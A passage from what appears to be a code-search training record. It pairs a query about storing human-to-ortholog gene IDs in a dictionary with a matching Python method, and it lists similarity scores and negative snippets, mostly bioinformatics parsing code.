{}\r\n\r\n for line in lines:\r\n line = line.strip()\r\n fields = line.split('\\t')\r\n id_ = fields[0].split()[0]\r\n result[id_] = {}\r\n for i, field in enumerate(fields[1:]):\r\n try:\r\n label = labels[i]\r\n except IndexError:\r\n continue\r\n try:\r\n value = process_fs[i](field)\r\n except IndexError:\r\n raise ValueError(\r\n \"Too few process functions provided (n=%d).\" %\r\n len(process_fs))\r\n result[id_][label] = value\r\n return result", "def table_with_routes(df, routes):\n full_names = []\n high_tax_list = []\n low_tax_list = []\n for org in in_taxa_dict.keys():\n group, subtax, long_name = in_taxa_dict[org]\n high_tax_list.append(group)\n low_tax_list.append(subtax)\n full_names.append(long_name)\n\n df = df[df.index.isin(in_taxa_dict.keys())]\n no_seqs = set(in_taxa_dict.keys()) - set(df.index)\n\n for taxon in no_seqs:\n df.loc[taxon] = len(df.columns) * [0]\n\n df.index.name = 'Unique ID'\n df.insert(loc=0, column='Lower Taxonomy', value=low_tax_list)\n df.insert(loc=0, column='Higher Taxonomy', value=high_tax_list)\n df.insert(loc=0, column='Full Name', value=full_names)\n\n df = df.sort_index(axis=0)\n df.to_csv(f'{output_fold}/occupancy.tsv', sep='\\t')\n\n # Adds routes to df\n for gene in df.columns:\n df[gene] = df[gene].apply(str)\n for org in df[gene].index:\n if org in routes[gene]:\n df.at[org, gene] = f'{df[gene][org]}_{routes[gene][org]}'\n\n df.to_csv(f'{output_fold}/occupancy_with_routes.tsv', sep='\\t')\n\n return df", "def taxon_children(self, taxonomy):\n\n taxon_children = defaultdict(set)\n for taxon_id, taxa in taxonomy.items():\n for i, taxon in enumerate(taxa):\n if len(taxon) == 3:\n continue # just rank prefix\n\n if len(taxa) > i + 1 and len(taxa[i + 1]) != 3:\n taxon_children[taxon].add(taxa[i + 1])\n\n if len(taxa) > self.rank_index['s__']:\n taxon = taxa[self.rank_index['s__']]\n if taxon != 's__':\n taxon_children[taxon].add(taxon_id)\n\n return taxon_children", "def __init__(self, filename):\n\n self.term_dict = {}\n for line in open(filename):\n if line.startswith(\"#\"):\n continue\n\n #print line\n word, w_type = line.strip().split(\"\\t\")\n self.term_dict[word.strip().lower()] = \"CHESS_\" + w_type.strip().lower()", "def createtown_random(self):\n town = m.Town()\n town.name = town.name + str(len(self.alltowns))\n self.print_mainlog(\n \"A new town, %s, appeared at %d,%d!\" %\n (town.name, town.pos.x, town.pos.y)\n )\n self.alltowns.append(town)", "def valueCountsSpecies(newDF, l, tax):\n df = newDF[newDF.index.isin(l)]\n df.loc[\"Total\"] = df.sum()\n vals = {}\n totalNum = 0\n for i in range(len(df.loc[\"Total\"])):\n if df.loc[\"Total\"][i] > 0:\n spec = df.columns[i]\n spec = spec.replace(\"_\", \" \")\n if spec in tax: \n try: \n phylum = tax[spec][\"phylum\"]\n except:\n continue\n #print(spec, tax[spec])\n #print(spec, phylum)\n if phylum in vals: \n vals[phylum] += 1\n else:\n vals[phylum] = 1\n totalNum += 1\n totalVals = {}\n otherVal = 0\n otherMakeup = []\n for key in vals.copy():\n percentage = 100*(float(vals[key]) / float(totalNum))\n if percentage <= 2.0:\n otherVal += vals[key]\n otherMakeup.append(key)\n vals.pop(key, None)\n totalVals[key] = percentage\n vals[\"Other\"] = otherVal\n \n return vals, otherMakeup, totalVals", "def parse_etymology() -> Dict[str, str]:\n with open(PATH_ETYMOLOGY, encoding=\"utf-8\") as f:\n\n buffer = defaultdict(list)\n for line in f:\n line = line.strip()\n\n # Skip empty lines\n if not line:\n continue\n\n # New block\n if line[1] == \" \" and line[2] == \"(\":\n hanzi = line[0]\n else:\n buffer[hanzi].append(line)\n\n result = {}\n for k,v in buffer.items():\n result[k] = \" \".join(v)\n\n return result", "def get_observable(stix_obj, log):\n res_obj = {}\n\n if stix_obj[u\"type\"] == \"relationship\":\n return None\n\n res_obj[u\"toxicity\"] = stix_obj.get(IBM_TOXICITY, \"\")\n res_obj[u\"relevance\"] = stix_obj.get(IBM_RELEVANCE, \"\")\n res_obj[u\"description\"] = get_observable_description(stix_obj, log)\n res_obj[u\"type\"] = get_observable_type(stix_obj, log)\n\n return res_obj", "def __getGeneOntologyChainMapping(self, siftsSummaryDirPath, csvFileName):\n fp = os.path.join(siftsSummaryDirPath, csvFileName)\n rowDL = self.__readSiftsSummaryFile(fp)\n logger.info(\"Length of SIFTS summary file %s %d\", csvFileName, len(rowDL))\n logger.debug(\"CSV keys: %r\", list(rowDL[0].items()))\n tD = {}\n for rowD in rowDL:\n entryId = rowD[\"PDB\"]\n chainId = rowD[\"CHAIN\"]\n prov = rowD[\"SP_PRIMARY\"]\n evidenceCode = rowD[\"EVIDENCE\"]\n goId = rowD[\"GO_ID\"]\n dD = {\"GO_ID\": goId, \"EV\": evidenceCode, \"PROV\": prov}\n tD.setdefault(entryId.upper(), {}).setdefault(chainId, []).append(dD)\n logger.info(\"GO data for %d entries\", len(tD))\n return tD", "def extant_taxa(self, taxonomy):\n\n extant_taxa = {}\n for rank_label in Taxonomy.rank_labels:\n extant_taxa.update(self.extant_taxa_for_rank(rank_label, taxonomy))\n\n return extant_taxa", "def make_envs_dict(abund_mtx, sample_names, taxon_names):\r\n num_samples, num_seqs = abund_mtx.shape\r\n if (num_samples, num_seqs) != (len(sample_names), len(taxon_names)):\r\n raise ValueError(\r\n \"Shape of matrix %s doesn't match # samples and # taxa (%s and %s)\" %\r\n (abund_mtx.shape, num_samples, num_seqs))\r\n envs_dict = {}\r\n sample_names = asarray(sample_names)\r\n for i, taxon in enumerate(abund_mtx.T):\r\n\r\n nonzeros = taxon.nonzero() # this removes zero values to reduce memory\r\n envs_dict[taxon_names[i]] = dict(zip(sample_names[nonzeros],\r\n taxon[nonzeros]))\r\n return envs_dict", "def get_locus_by_taxon(id): # noqa: E501\n return 'do some magic!'", "def loadCity(fileid):\n dinf = {}\n root = etree.Element(\"city\")\n text = None\n statename = \"\"\n statefile = \"\"\n cityname = \"\"\n dinf['m'] = {}\n dinf['m']['events'] = {}\n # TODO: put this in a global variable, and make a function to populate it from the DTD.\n tags = [\"name\",\"state\",\"statefile\",\"start\",\"scue\",\"end\",\"ecue\",\"place\",\"aspects\"]\n for tag in tags:\n dinf[tag] = [\"\",False]\n dinf['aspects'] = {}\n if not dinf.get(\"places\"): dinf['places'] = {}\n if not idExists(fileid):\n status.push(0,\"new city created... '%s'\" % fileid)\n return dinf\n fn = os.path.join(config['realmdir'],\"%s.xml\" % fileid)\n status.push(0,\"loading city from XML... '%s'\" % fn)\n try:\n with codecs.open(fn,'rU','utf-8') as f:\n tree = etree.parse(f)\n f.close()\n root = tree.getroot()\n except IOError as e:\n print \"c: Could not open configuration file: %s\" % e\n\n ir = 0\n for i in range(len(root)):\n if root[i].tag is not None:\n if root[i].tag == \"place\":\n if len(root[i]) > 0:\n node = \"\"\n node = root[i].find(\"file\")\n if node.text:\n node = node.text.strip()\n node = common.validateFileid(node)\n dinf['places'][node] = {}\n for j in root[i]:\n if j.tag and j.text and j.tag != \"file\":\n dinf['places'][node][j.tag] = [j.text.strip(),False]\n if config['debug'] > 3: print dinf['places'][node]\n else:\n if config['debug'] > 0:\n print \"Invalid place tag:\"\n for c in root[i]:\n print c.tag + ': ' + c.text,\n else: # no relat length\n if config['debug'] > 0: print \"Empty place tag.\"\n elif root[i].tag == \"events\":\n if len(root[i]) > 0:\n nodes = root[i]\n for node in nodes:\n k = str(len(dinf['m']['events']))\n dinf['m']['events'][k] = {}\n for j in node:\n if j.tag and j.text:\n dinf['m']['events'][k][j.tag] = [j.text.strip(),False]\n else:\n if config['debug'] > 0:\n print \"Invalid milestone tag:\"\n for c in node:\n print c.tag + ': ' + c.text,\n if config['debug'] > 3: printPretty(dinf['m']['events'])\n else: # no relat length\n if config['debug'] > 0: print \"Empty milestone tag.\"\n elif root[i].tag == \"aspects\":\n if len(root[i]) > 0:\n nodes = root[i]\n for node in nodes:\n k = str(len(dinf['aspects']))\n dinf['aspects'][k] = {}\n if node.tag and node.text:\n dinf['aspects'][k] = [node.text.strip(),False]\n else:\n if config['debug'] > 0:\n print \"Invalid aspects tag:\"\n print node.tag + ': ' + node.text,\n else: # no aspects length\n if config['debug'] > 0: print \"Empty aspects tag.\"\n elif root[i].text is not None:\n if root[i].tag == \"statefile\":\n statefile = root[i].text.strip()\n statefile = common.validateFileid(statefile)\n if statefile is None: statefile = \"\"\n elif root[i].tag == \"state\":\n statename = root[i].text.strip()\n elif root[i].tag == \"name\":\n cityname = root[i].text.strip()\n dinf[root[i].tag] = [root[i].text.strip(), False]\n if config['debug'] > 2: print str(i) + \" \",\n if len(statefile) > 0: pushLoc(statefile,statename,fileid,cityname)\n return dinf", "def animals_by_species(self):\n print self.animal()", "def _get_all_oshapes(self):\n iseq_name = self.node_list[0]\n iseq = self.builder.nodes[iseq_name]\n iseq_mainshape = iseq.oshapes['main']\n \n return {'main' : iseq_mainshape,\n 'loc' : iseq_mainshape,\n 'invscaled' : iseq_mainshape + [iseq_mainshape[-1]],\n 'invscaleoffd' : iseq_mainshape + [iseq_mainshape[-1]]}" ]
[ "0.62028277", "0.5643144", "0.55928254", "0.5586047", "0.5550129", "0.5545237", "0.55178034", "0.54141647", "0.5405542", "0.5331211", "0.528797", "0.52788687", "0.5253945", "0.52389264", "0.5223071", "0.52124864", "0.516965", "0.51686347", "0.51635945", "0.49660262", "0.49572685", "0.49468812", "0.4933717", "0.49297443", "0.49112213", "0.49094617", "0.48972872", "0.4891772", "0.48882136", "0.48873076", "0.48791263", "0.4875703", "0.48654377", "0.48565212", "0.48425257", "0.48131967", "0.4793532", "0.47880322", "0.47878018", "0.4787729", "0.47716266", "0.47637832", "0.47580788", "0.47534636", "0.47498828", "0.47481045", "0.47412547", "0.47397614", "0.4724246", "0.47240007", "0.47238767", "0.4721686", "0.47147682", "0.47056356", "0.4678703", "0.46618032", "0.4659743", "0.4655493", "0.46381202", "0.46321014", "0.46262538", "0.4625299", "0.4619253", "0.46122545", "0.46096027", "0.46082482", "0.4602801", "0.45992818", "0.45929617", "0.45825246", "0.4580829", "0.45630735", "0.45586604", "0.45548093", "0.4554265", "0.45526564", "0.45396143", "0.45308253", "0.4523525", "0.45225468", "0.4520045", "0.45100617", "0.45026943", "0.45004636", "0.45004556", "0.44995746", "0.44947657", "0.44899726", "0.44796985", "0.44737962", "0.4468629", "0.44677818", "0.44670567", "0.44652238", "0.44603136", "0.44418114", "0.44413173", "0.44409233", "0.44349682", "0.44342393" ]
0.6710074
0
add an entry in the dic with key "human gene ID" and value "ortholog gene ID"
def add_gene(self, human_gene, ortholog): if human_gene not in self.genes: self.genes[human_gene] = list() self.genes[human_gene].append(ortholog)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update_gene_info(ensembl_info, word, value):\n if \"gene\" in word:\n if \"id\" in word:\n ensembl_info[\"ensembl_gene_id\"] = value\n elif \"start\" in word:\n ensembl_info[\"gene_start\"] = int(value)\n elif \"end\" in word:\n ensembl_info[\"gene_end\"] = int(value)\n return ensembl_info", "def _add_chebi_identifiers(map_dict) -> dict:\n sys.stdout.write(\"Adding ChEBI identifiers...\\n\")\n all_chebi = [k for k in map_dict if k.lower().startswith('chebi')]\n\n ch = ChEBI()\n\n for chebi_id in tqdm.tqdm(all_chebi, total=len(all_chebi)):\n uid = chebi_id.split(':')[-1]\n\n try:\n # query ChEBI API\n result = ch.getCompleteEntity(uid)\n except Exception as x:\n print(\"%s: %s\" % (chebi_id, x.__class__.__name__))\n continue\n\n to_add = []\n\n if hasattr(result, 'SecondaryChEBIIds'):\n to_add += [str(s) for s in result.SecondaryChEBIIds]\n\n if hasattr(result, 'OntologyChildren'):\n to_add += [str(ent.chebiId) for ent in result.OntologyChildren\n if ent.type in ('is conjugate acid of',\n 'is conjugate base of',\n 'is tautomer of')]\n\n if hasattr(result, 'OntologyParents'):\n to_add += [str(ent.chebiId) for ent in result.OntologyParents\n if ent.type in ('is conjugate acid of',\n 'is conjugate base of',\n 'is tautomer of')]\n\n for ent_id in to_add:\n new_id = '{}:{}'.format('ChEBI', ent_id.split(':')[-1])\n map_dict[chebi_id].add(new_id)\n\n return map_dict", "def _get_gene_map(self) -> OrderedDict:\n if \"gene\" not in self.data:\n return OrderedDict()\n\n genes: OrderedDict = OrderedDict()\n for idx, genestr in self.data[\"gene\"].items():\n if pd.isnull(genestr):\n continue\n for gene in genestr.split(\",\"):\n if gene not in genes:\n genes[gene] = []\n genes[gene].append(idx)\n return genes", "def get_gene_id_dict(list_of_results):\n dict1 = {}\n for i, dict2 in enumerate(list_of_results):\n key = dict2[\"GeneID\"]\n if key in dict1.keys():\n # list1 = dict1[key]\n # list1.append(list_of_results[i])\n # dict1[key] = list1\n # list1.append(list_of_results[i])\n dict1[key].append(list_of_results[i])\n else:\n dict1[key] = [list_of_results[i]]\n return dict1", "def addDic(dic, elt):\n pass", "def test_addDict(self):\n lidi = []\n lidi.append({'term': 'foo', 'tags': 'a', 'value': '1'})\n lidi.append({'term': 'bar', 'tags': 'a, b', 'value': '2'})\n lidi.append({'term': 'gnark', 'tags': 'a, c', 'value': '3'})\n self.g.add_dict(lidi)", "def addToHistogram(s,d):\n\n if s in d:\n #if the character is in the dictionary, the amount of that character record increases \n d[s] += 1\n else:\n #if not in the dictionary, a new key & value will be made\n d[s] =1\n\n #lastly returns the dictionary itself \n return d", "def set_dict(self, lines):\n for line in lines:\n line = line.rstrip()\n split_line = line.split(\"\\t\")\n old_gene_id = split_line[0]\n new_gene_id = split_line[2]\n conv_dict = self.conversion_dict\n conv_dict[old_gene_id] = new_gene_id\n self.conversion_dict = conv_dict", "def gene_ID_wrangler(inpAcc):\n \n print(\"processing gene symbols\")\n \n resD = {}\n \n for convI in inpAcc:\n keyI = convI[\"InputValue\"]\n valueI = convI[\"Gene ID\"]\n resD[keyI] = valueI\n\n return resD", "def _add_uniprot_identifiers(map_dict) -> dict:\n sys.stdout.write(\"Adding UniProt identifiers...\\n\")\n r_session = base_utils.requests_retry_session()\n all_uniprot = [k for k in map_dict if k.lower().startswith('uniprot')]\n\n for uniprot_id in tqdm.tqdm(all_uniprot, total=len(all_uniprot)):\n db, uid = uniprot_id.split(':')\n\n try:\n # query UniProt API\n r = r_session.get(\n 'http://www.uniprot.org/uniprot/' + uid + '.xml'\n )\n except Exception as x:\n print(\"%s: %s\" % (uniprot_id, x.__class__.__name__))\n continue\n\n if r.content:\n root = etree.fromstring(r.content)\n if root:\n for s in root[0]:\n if s.tag.endswith('accession'):\n new_id = '{}:{}'.format('UniProt', s.text.split(':')[-1])\n map_dict[uniprot_id].add(new_id)\n else:\n break\n\n return map_dict", "def build_gene_indexes(df):\n\tgeneDict = OrderedDict()\n\n\tgeneCount = 0\n\tpreviousGeneIndex = 0\n\n\tcurrent_id=\"\"\n\tcurrent_gene=\"\"\n\n\tfor i in range(len(df)):\n\n\t\tif df.loc[i,'feature'] == 'gene':\n\t\t\ttrdict = parse_entry(df.loc[i,'transcript_id'])\n\n\t\t\tcurGeneID = trdict['gene_id'][0]\n\t\t\n\t\t\tif geneCount != 0:\n\t\t\t\tnewGeneIndex = i\n\t\t\t\tgeneDict[current_id] = [previousGeneIndex,newGeneIndex]\n\t\t\t\tpreviousGeneIndex = i\n\t\t\t\tcurrent_id = trdict['gene_id'][0]\n\t\t\t\tgeneCount += 1\n\n\t\t\telse:\n\t\t\t\tnewgeneIndex = 0\n\t\t\t\tgeneCount +=1\n\t\t\t\tcurrent_id = trdict['gene_id'][0]\n\t\tif i == (len(df)-1):\n\t\t\tnewGeneIndex = i+1\n\t\t\tcurrent_id = trdict['gene_id'][0]\n\t\t\tgeneDict[current_id] = [previousGeneIndex,newGeneIndex]\n\treturn geneDict", "def init_gene():\n gene_details=dict(\n id = '', \n anno_id = [],\n confgenes_id = [],\n name = '',\n source = '',\n gene_info = {},\n alias = '',\n name2 = [],\n strand = '',\n chr = '',\n chr_num = [],\n paralogs = [],\n start = '',\n stop = '',\n transcripts = [],\n transcript_info = [],\n transcript_status = [],\n transcript_valid = [],\n exons = [],\n exons_confirmed = [],\n cds_exons = [],\n utr5_exons = [],\n utr3_exons = [],\n tis = [],\n tis_conf = [],\n tis_info = [],\n cdsStop = [],\n cdsStop_conf = [],\n cdsStop_info = [],\n tss = [],\n tss_info = [],\n tss_conf = [],\n cleave = [],\n cleave_info = [],\n cleave_conf = [],\n polya = [],\n polya_info = [],\n polya_conf = [],\n is_alt = [],\n is_alt_spliced = 0,\n is_valid = [],\n transcript_complete = [],\n is_complete = [],\n is_correctly_gff3_referenced = '',\n splicegraph = []\n )\n return gene_details", "def _add_item(dic: dict, keys: list, value):\n\tfor key in keys[:-1]:\n\t\tdic = dic.setdefault(key, {})\n\n\tdic[keys[-1]] = value", "def createIndivitual(self) -> Dict[str, Any]:\n ind = {\n \"genome\": {\n key: numpy.random.randint(0, len(value), size=self.ref_count[key]) for (\n key, value) in self.grammar.items()\n },\n \"fitness\": None,\n \"fenotype\": None,\n }\n return ind", "def add(self, key, value):", "def anno_gene_stats(anno_gene, loc_file, gene_file, isConvert):\r\n LocationNum = collections.Counter()\r\n LocationGene = collections.defaultdict(list)\r\n\r\n\r\n GeneCatSample = collections.defaultdict(lambda: collections.defaultdict(list))\r\n CatGeneSample = collections.defaultdict(lambda: collections.defaultdict(list))\r\n\r\n allLocations = set()\r\n anno_h = open(anno_gene, \"r\")\r\n for line in anno_h:\r\n lines = line.strip().split(\"\\t\")\r\n sample, location, number, gene = lines[:4]\r\n number = int(number)\r\n\r\n ### whether convert the category to \"Exon\" or \"Intron\"\r\n if isConvert == \"True\":\r\n if location == \"Intron\":\r\n newLoc = \"Intron\"\r\n else:\r\n newLoc = \"Exon\"\r\n elif isConvert == \"False\":\r\n newLoc = location\r\n else:\r\n print(\"Please check whether convert the original category to 'Intron' or 'Exon' based on True of False.\")\r\n sys.exit(1)\r\n\r\n allLocations.add(newLoc)\r\n ### get the dict of gene -> location -> sample\r\n genes = gene.split(\",\")\r\n for g in genes:\r\n GeneCatSample[g][newLoc].append(sample)\r\n\r\n ### get the location -> gene -> sample\r\n CatGeneSample[newLoc][g].append(sample)\r\n anno_h.close()\r\n\r\n\r\n ## output gene and number in samples\r\n ### sort all locations\r\n sortedAllLocation = sorted(list(allLocations))\r\n\r\n gene_h = open(gene_file, \"w\")\r\n\r\n headerSample = [l + \"_samples\" for l in sortedAllLocation]\r\n gene_h.write(\"Gene\\tTotal\\t%s\\t%s\\n\" % (\"\\t\".join(sortedAllLocation), \"\\t\".join(headerSample)))\r\n\r\n GeneRecord = {}\r\n GeneNumber = {}\r\n\r\n allGenes = sorted(list(GeneCatSample.keys()))\r\n for ge in allGenes:\r\n ### get the number and samples for each location of each gene\r\n GeneNum = []\r\n GeneSample = []\r\n\r\n for loc in sortedAllLocation:\r\n if loc in GeneCatSample[ge]:\r\n samples = GeneCatSample[ge][loc]\r\n ##############################\r\n ####### unique for samples\r\n samples = sorted(list(set(samples)))\r\n sampleNum = len(samples)\r\n else:\r\n sampleNum = 0\r\n samples = [\"-\"]\r\n\r\n GeneNum.append(sampleNum)\r\n GeneSample.append(samples)\r\n\r\n GeneNumSum = sum(GeneNum)\r\n CatNumOut = \"\\t\".join([str(g) for g in GeneNum])\r\n CatSampleOut = \"\\t\".join([\",\".join(s) for s in GeneSample])\r\n\r\n record = \"%s\\t%d\\t%s\\t%s\\t\" % (ge, GeneNumSum, CatNumOut, CatSampleOut)\r\n GeneNumber[ge] = GeneNumSum\r\n GeneRecord[ge] = record\r\n \r\n ### output\r\n GeneNumSorted = sort_dict_value(GeneNumber)\r\n for g, n in GeneNumSorted:\r\n r = GeneRecord[g]\r\n gene_h.write(\"%s\\n\" % r)\r\n\r\n gene_h.close() \r\n\r\n\r\n ### location and genes\r\n loc_h = open(loc_file, \"w\")\r\n loc_h.write(\"Location\\tGeneNumber\\tGenes\\tSampleNumber\\tSamples\\n\")\r\n for loc in sortedAllLocation:\r\n geneSample = CatGeneSample[loc]\r\n genes = sorted(list(geneSample.keys()))\r\n geneNum = len(genes)\r\n samNum = 0\r\n samList = []\r\n for ge in geneSample:\r\n sam = geneSample[ge]\r\n samList.append(sam)\r\n samNum += len(sam)\r\n samOut = \";\".join([\",\".join(s) for s in samList])\r\n loc_h.write(\"%s\\t%d\\t%s\\t%d\\t%s\\n\" % (loc, geneNum, \",\".join(genes), samNum, samOut))\r\n loc_h.close()", "def add_protogene(self, protogene):\n if protogene.name:\n name = protogene.name\n else:\n name = str(self.num_protogenes())\n self.protogenes[name] = protogene", "def write_concat_GO_dicts(self, *GO_dict):\n\n for i, j in zip(self.IDs[0:3], GO_dict):\n with open(i, 'w') as f:\n f.write('transcript_id\\tgene_ontology\\n')\n for k, v in j.iteritems():\n f.write(k + '\\t' + '\\t'.join(v) + '\\n')", "def gencode_dic(gencode_file,gene_type_dic):\n gen_dic = {}\n for i in range(1,len(gencode_file)):\n words_gen = gencode_file[i].strip().split('\\t')\n chr_no = words_gen[2]\n trans_id = words_gen[1]\n cds_info = words_gen[13]\n cde_info = words_gen[14]\n gene_type = gene_type_dic[trans_id]\n gene_name = words_gen[12]\n TSS_start = int(words_gen[4])\n TSS_end = int(words_gen[5])\n CDS_start = int(words_gen[6])\n CDS_end = int(words_gen[7])\n strand = words_gen[3]\n start_list = [int(x) for x in words_gen[9].split(',')[:-1]]\n end_list = [int(x) for x in words_gen[10].split(',')[:-1]]\n exon_no = int(words_gen[8])\n# if (chr_no,trans_id) in gen_dic: #Some trans_id are not unique, especially transcripts in chrX and chrY\n# print trans_id\n interval_list = [P.closedopen(start_list[x],end_list[x]) for x in range(0,exon_no)]\n interval_merge = P.empty()\n for i in range(0,len(interval_list)):\n interval_merge = interval_merge | interval_list[i]\n if gene_type == 'protein_coding':\n if (cds_info == 'cmpl') and (cde_info == 'cmpl'):\n # print (interval_merge)\n gen_dic.setdefault((chr_no,strand),[]).append([TSS_start,TSS_end,CDS_start,CDS_end,\\\n gene_name,gene_type,interval_merge])\n else:\n gen_dic.setdefault((chr_no,strand),[]).append([TSS_start,TSS_end,CDS_start,CDS_end,\\\n gene_name,gene_type,interval_merge])\n return gen_dic", "def add(self, val: dict):\n keys = self.header or val.keys()\n vals = tuple(val.get(k) for k in keys)\n self[vals] += 1", "def process_gene_line(self, line):\n kwargs = self.extract_gene_args(line)\n if not kwargs:\n return\n gene_id = kwargs['identifier']\n self.genes[gene_id] = Gene(**kwargs)", "def _addCounterToMap(probeMap, counter, index):\n if counter.probe in probeMap:\n probeMap[counter.probe].append(index)\n else:\n probeMap.update({counter.probe : [index]})", "def internal_id_append(json_keys, json):\n candidate_id = 0\n for name in list(json_keys):\n json[name]['internal_id'] = candidate_id\n candidate_id += 1\n return json", "def add(self, entry):\n \"An entry is a tuple of (id, datatime, text).\"\n id = entry[0]\n datee = entry[1]\n text = re.sub('[^A-Za-z0-9]+', ' ', entry[2].lower())\n self.recordsDict[id].create(id, datee, entry[2])\n for word in text.split():\n self.wordDict[word].add(id)", "def addOmimAnnotation(merged_data, OmimAnnotationFile):\n omim_genes = dict.fromkeys(list(OmimAnnotationFile['ENSID']))\n has_omim = []\n for index, row in merged_data.iterrows():\n human_ensid = str(row['Human ENSID'])\n if human_ensid in omim_genes:\n has_omim.append('t')\n else:\n has_omim.append('f')\n\n merged_data['Has Omim Annotation'] = has_omim\n return", "def _add_new_word(self, word):\n if word not in self.word_to_id:\n word_id = len(self.word_to_id)\n self.word_to_id[word] = word_id\n self.id_to_word[word_id] = word", "def append_data(dic,key,value):\n if(dic.has_key(key)):\n dic[key].append(value)\n else:\n dic[key] = [value]\n return dic", "def add_dict_entry(dictionary: dict, key: Any, value: Any) -> None:\n try:\n dictionary[key].append(value)\n except KeyError:\n dictionary[key] = [value]", "def buildDict(self, dict):\n for word in dict:\n self.add(word)", "def add(self, item):\n self._dict[item] = item", "def addItem(self, key):\n if key in self.dictionary:\n raise Exception(\"Key already exist in dictionary\")\n self.dictionary[key] = WordInformation(self.MAX_RATING)", "def __init__(self, taxid, species_name = None, lineage=None):\n self.genes = dict()\n self.taxid = taxid\n self.species = species_name\n self.lineage = lineage", "def printing_summary_gene_report(gene_dict):\n #Creating a summary report for data\n summary_gene_report = open('summary_gene_report.txt', 'w')\n summary_gene_report.write(\"Accesssion ID\\tDescription\\tCounts\\n\")\n for key in gene_dict:\n accession_ID=str(key) \n gene_description=str(gene_dict[key][0])\n gene_counts=str(gene_dict[key][1])\n summary_gene_report.write(accession_ID+\"\\t\"+gene_description+\"\\t\"+gene_counts+\"\\n\")\n summary_gene_report.close()", "def build_dictionary_gensim():\r\n\t# if load_dictionary_gensim():\r\n\t#\treturn\r\n\t\r\n\tglobal gensim_dictionary, common_corpus_list\r\n\t\r\n\tprint('\\nbuilding dictionary')\r\n\tgensim_dictionary = gensim.corpora.Dictionary()\r\n\t\r\n\tfor v in common_corpus_list:\r\n\t\tgensim_dictionary.add_documents([v[1].lower().split()])\r\n\t\t\r\n\tgensim_dictionary.save_as_text(paths.path_data_dictionary_txt)\r\n\tgensim_dictionary.save(paths.path_data_dictionary_dict)\r\n\r\n\t# print(gensim_dictionary.token2id)\r\n\tprint(gensim_dictionary)", "def addGene(self, *args):\n return _libsbml.Association_addGene(self, *args)", "def add_ngrams(mydict,sentence):\n ngrams = get_ngrams(sentence,2,3)\n for ngram in ngrams:\n if ngram in mydict:\n mydict[ngram]+=1\n else:\n mydict[ngram]=1\n return mydict", "def associate_node_id(tr, node=\"\"):\n return {\"id\": tr.get_uml_id(name=node)}", "def add_info(self, key, val):\r\n return self.add_infos((key, val))", "def gff3_parsed (gff3_file, sam_dic):\n\n #A special type of dictionary in which the values were saved in a list\n gff_dic = defaultdict(list)\n\n gff3_file = open(arg.gff3_infile)\n gff3_dic = {}\n\n gene_dic = {}\n exon_list = []\n gene_idx = 1\n\n counter_1 = 0\n counter_2 = 0\n counter_3 = 0\n counter_4 = 0\n counter_5 = 0\n counter_6 = 0\n counter_7 = 0\n idx_pseudogene = 0\n\n #A dictionary\n gene_idexes = {\"gene\": gene_idx, \"exon\": gene_idx,\n \"pseudogene\": \"pseudogene\"}\n\n\n for line in gff3_file:\n if line.startswith(\"##\"):\n pass\n elif line.startswith(\"#!\"):\n pass\n else:\n line_information = line.strip().split()\n\n # Make a dic with the genes present on Gg genome and its anotattion\n if line_information[2] == (\"gene\"):\n # deal with the PREVIOUS gene\n #This peace of code add to the gff3_dic(the main dic of gff3 file)\n #the information of which are the exons of one particular gene\n #Note: this happends at the same time that the gene information\n #were parsed\n if exon_list:\n gff3_dic[gene_idx][\"exon_list\"] = exon_list\n gene_idx += 1\n\n exon_list = []\n #parse the gene information and add this information to a new dic (gff3_dic)\n #with all the information related to the genes present in gff3 file (Cg_Nara5)\n # deal with CURRENT gene\n scaffold = line_information [0]\n gene_beg = line_information[3]\n gene_end = line_information [4]\n gene_loc = [gene_beg, gene_end]\n gene_strand = line_information[6]\n gene_information = line_information [8]\n gene_information = line.strip().split(\";\")\n gene_description = [gene_information[2]]\n gff3_dic[gene_idx] = {\"scaffold\": scaffold,\n \"gene_range\": gene_loc,\n \"description\": gene_description,\n \"exon_list\": None,\n \"strand\": gene_strand}\n\n # Make a list with the exons-genes present on Gg genome and its anotattion\n # If in this line the \"gene\" keyword is not present but the \"exon\"\n #keyword are append the range information to the exon list which\n # will be added to main gff3 dic\n elif line_information[2] == (\"exon\"):\n exon_beg = line_information[3]\n exon_end = line_information [4]\n exon_loc = (exon_beg, exon_end)\n exon_list.append(exon_loc)\n\n exon_information = line_information [8]\n exon_information = line.strip().split()[8].split(\";\")[0]\n gff3_dic[gene_idx][\"exon_reference\"] = exon_information\n #At the same time - regardless the previous code if the line has\n #any of this keywords the information of the gene_range were added\n # to the gff_dic.\n if line_information[2] in [\"gene\", \"exon\", \"pseudogene\"]:\n\n gene_range = (line_information[3], line_information[4])\n\n #Note: this peace of code happends because the gene description\n #of the gene is not the same as the exon description. Therefore,\n #the gene description has to be recovered\n\n if line_information[2] == \"gene\":\n gene_information = line_information [8]\n gene_information = line.strip().split(\";\")\n gene_description = [gene_information[2]]\n\n # Example:\n # gff_dic[scaffold1] = [[1, \"gene\", (82, 1159), description],\n # 1, \"exon\", (82, 603), description],\n # 2, \"gene\", (1440, 4998), description\n # pseudogene_idx, pseudogene, (1999, 3000)]]\n\n #To keep only the information regardless gene_idx (gene index)\n #to the gene or the exons present in this gene. When I have\n #pseudogenes, the gene index is replaced for pseudogene\n if line_information[2] in [\"exon\", \"gene\"]:\n idx = gene_idx\n else:\n idx_pseudogene += 1\n idx = \"pseudogene_\"+ str(idx_pseudogene)\n\n #add the previous information in a different format in which\n #the key is the sacffold and the values are the index (to easly\n #acess the information present in gff3 dictionary), the keyword\n #(gene, exon, pseudogene), the range, and the description.\n #All these informations will be used to perfome the SNP range\n # discover only within the true scaffold and not in all the scaffolds\n #present in the gff3 file. Making the code mor efficient and realibel\n gff_dic[line_information[0]].append([idx,\n line_information[2],\n gene_range,\n gene_description])\n\n # Add last exon list to last gene index\\\n else:\n if exon_list:\n gff3_dic[gene_idx][\"exon_list\"] = exon_list\n\n print (\"Step 3a - Parse the .gff3 file -- Done\")\n\n\n for locus, info_dict in sam_dic.items():\n\n # Get all info from current scaffold\n # scaffold_info is a list containing all genes, exons and pseudogenes\n # of the scaffold in sam_dic\n\n scaffold_info = gff_dic[info_dict[\"scaffold\"]]\n #we create two different \"values\" in the sam_dic dictionary with the len\n #of the real snp location in which all the \"values\" begin with \"intergenic\" or None\n #and as we make the check codes this values will be replaced for new\n # values or will be remain like this\n\n info_dict[\"element_type\"] = [\"intergenic\"] * len(info_dict[\"real_snp_localization\"])\n info_dict[\"element_range\"] = [None] * 